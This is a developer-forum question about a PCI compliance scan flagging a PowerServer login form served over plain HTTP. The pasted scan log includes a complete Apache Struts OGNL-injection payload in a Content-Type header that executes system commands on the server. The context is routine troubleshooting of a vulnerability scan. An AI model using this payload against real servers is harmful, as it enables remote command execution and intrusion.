Failed PCI Compliance scan because login is accessible from http (port 80)

View Replies (3)

Resolved Failed PCI Compliance scan because login is accessible from http (port 80)

Issue

1 Votes

Trevor Holyoak
PowerServer 2020 or older (Obsolete)
Thursday, 29 April 2021 04:50 PM UTC

Is there a way to fix this? The server automatically redirects to HTTPS when the initial web connection is made, but apparently when the IWA login dialog comes up it just uses HTTP? Is there a setting we need to change, or is this a deeper problem?

This is what the scan results say:

The Web server uses plain-text form based authentication. A web page exists on the target host which uses an HTML login form. This data is sent from the client to the server in plain-text.

GET /servlet/ HTTP/1.0 Host: {ip address removed} Accept-Encoding: gzip, deflate Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 Content-Type: %{(#nike='multipart/form-data& apos;).(#dm=@ognl.OgnlContext@DEFAULT_MEMB ER_ACCESS).(#_memberAccess?(#_memberAcces s=#dm):((#container=#context['com.opensymp hony.xwork2.ActionContext.container']).(#ognl Util=#container.getInstance(@com.opensymphony.xw ork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPa ckageNames().clear()).(#ognlUtil.getExcludedClasses ().clear()).(#context.setMemberAccess(#dm)))).(#cmd linux='ifconfig').(#cmdwin='ipconfi g').(#iswin=(@java.lang.System@getProperty( 'os.name').toLowerCase().contains(&ap os;win'))).(#cmds=(#iswin?{'cmd.exe&ap os;,'/c',#cmdwin}:{'/bin/bash','-c',#cmdlinux})).(#p=new java.lang.Pro cessBuilder(#cmds)).(#p.redirectErrorStream(true)).(# process=#p.start()).(#ros=(@org.apache.struts2.Servl etActionContext@getResponse().getOutputStream())) .(@org.apache.commons.io.IOUtils@copy(#process.g etInputStream(),#ros)).(#ros.flush())} <form name="LogonForm" method=&qu ot;post" action="./Logon.aspx?ReturnUrl= %2fservlet%2f" id="LogonForm" styl e=" width:330px;" autocomplete="off "> <input type="hidden" name="__VI EWSTATE" id="__VIEWSTATE" val ue="/wEPDwUJMzU4MzUwNDk4D2QWBgICD 2QWAgICDw9kFgIeCm9ua2V5cHJlc3MFGktleXByZX NzQ2hlY2soJ05VTUxFVFVORCcpZAIDDxYCHgRUZ Xh0BS1BcHBlb24gUG93ZXJTZXJ2ZXIgMjAyMCZuY nNwQnVpbGQmbmJzcDIzMjMuMDBkAgUPFgIeCWl ubmVyaHRtbGVkZFv1uIy24hgqz6b76aLqjSBWnmXy 5Z8+sia4CcFL859T" /> <input type="hidden" name="__VI EWSTATEGENERATOR" id="__VIEWSTA TEGENERATOR" value="79179283" /> <div class="input-infor"> <label>    <span id="lblUser&qu ot;>User name</span>: </label>  <input name="username" type="text" maxlength="30" id="userna me" onkeypress="KeypressCheck(& #39;NUMLETUND')" /> </div> <div class="input-infor"> <label>    <span id="lblPasswor d">Password</span>: </label>  <input name="password" type="pa ssword" id="password" /> </div> <div class="submit-infor"> <span class="submitSpan">  <input type="submit" name="btnS ubmit" value="Logon" id="btnS ubmit" class="button" />

PowerServer 2021 Beta Question The column type does not match

Responses (3)

Likes
Latest
Oldest

Find Questions by Tag

.EXE .NET 6.0 .NET Assembly .NET Core 3.1 .NET Core Framework .NET DataStore .NET Std Framework 32-bit 64-bit ADO.NET AEM AI Algorithm Amazon AWS Android Apache API APK App Store App Store (Apple) Appeon Workspace Appeon Xcelerator Plug-in Architecture Array ASE Asynchronous Methods Authentication AutoBuild AutoCompiler Automated Testing Automation AutoScript Azure Barcode Base64 Batch BigData BLOB Branch & Merge Browser Bug Build Button C# C# Class Importer C# Editor C# Model generator Calendar Camera Certificate Chrome Citrix Class Client Client/Server Cloud Cluster Collection COM Command Line Compiler Compression Computed Field Configuration Controls Cookies Cordova Crash Cross-Platform Crosstab CSharpAssembly CSharpObject CSS CSV Cursor Data Database Database Driver Database Painter Database Profile Database Provider DataObject DataSource DataStore DataStore (C#) DataStore (PS) DataType DataWindow DATE DATETIME DB2 Debug Debugger Debugging Deployment Design DLL DO-WHILE Dockable Docker Documentation DOUBLE Download DragDrop Edge Edit Style Editor Elevate Conference Email Embedded SQL Emulator Encoding Encryption Enhancement Request Entity Entity Framework ERP Error Event Event Handler Event Handling Excel Exception Export Expression External Functions F# Field File File Access Filter Firefox Firewall Font FOR-NEXT Foreground Format Function Garbage Collection GeoLocation Git Graph HANA Hash Header HTML/5 HTTP/S HTTPClient Icon IDE Identity IIS IMAPI Import InfoMaker Inheritance Installation Integer IntelliSense Interface Internet Internet Explorer iOS IPA iPad iPhone IWA J# Java JavaScript JBoss JDBC JOIN JSON JSONGenerator JSONParser Kestrel Label Lambda Large File LDAP Library License LINQ Linux OS Load Balancing Localization Localized PBVM Log In Log Out Logging LONG LONGLONG macOS MAPI Maps MDI Memory Memory Leak Menu Merge MessageBox Messagging Method Migration MIME TYPE Mobile Model ModelStore ModelStore (C#) MSOLEDBSQL Multi Threading MVC MySQL n-Tier Namespace NativePDF NVO OAuth ODATA ODBC Office Offline OLE OLEDB Online Open Source OpenAPI OpenSSL Oracle OrcaScript Other Outlook Output Package Parameter Patch PayPal PB Classic PB Native PB.NET PBC PBD PBDOM PBG PBJVM PBL PBNI PBORCA PBVM PBX PDF Performance Permission PFC Picture Pipeline Play Store (Google) Plugin Popup Port POST PostgreSQL PowerBuilder PowerBuilder (Appeon) PowerBuilder (SAP) PowerBuilder Compiler PowerBuilder Runtime PowerClient PowerScript (PS) PowerScript IDE PowerScript Migrator PowerServer PowerServer Mobile PowerServer Toolkit PowerServer Web PowerServerLabel Print Properties Proxy Publish PULL PUSH Query Regression Release Renew Resize Response REST Retrieve RibbonBar RibbonBar Builder Rich Text Roadmap RPC Runtime Packager SaaS Scaffolding Script SDI SDK Security Server Service Session Single Sign-on Size SMTP SMTPClient SnapDevelop SOAP Sort Source Code Speech Recognition SQL SQL Anywhere SQL Server SqlBuilder SqlExecutor SQLite SqlModelMapper Storage Stored Procedure Subscription SVN Swagger Syntax TabbedBar TabbedView Tablet TabPage Target TE Control Testing Text TFS Theme TIME Timer TLS/SSL Tomcat TortoiseGit TortoiseSVN Transaction Transparency Trial Trigger TRY-CATCH TX Control Type UI ULONG UltraLite Uninstall Unit Test Unit Testing UNIX OS Update Upgrade Upload URL User Center User Object UWP Validation VARCHAR Variable Versioning Visual Studio Visual Studio Code VM Voice Warning WCF Web API Web Extensions Web Service WebBrowser WebForms WebLogic WebSphere WildFly WinAPI Window Windows OS WinForms Wizard Workgroup Workspace WPF XCODE XHTML XML Zoom

✖

Helpful?

If a reply or comment is helpful for you, please don’t hesitate to click the Helpful button. This action is further confirmation of their invaluable contribution to the Appeon Community.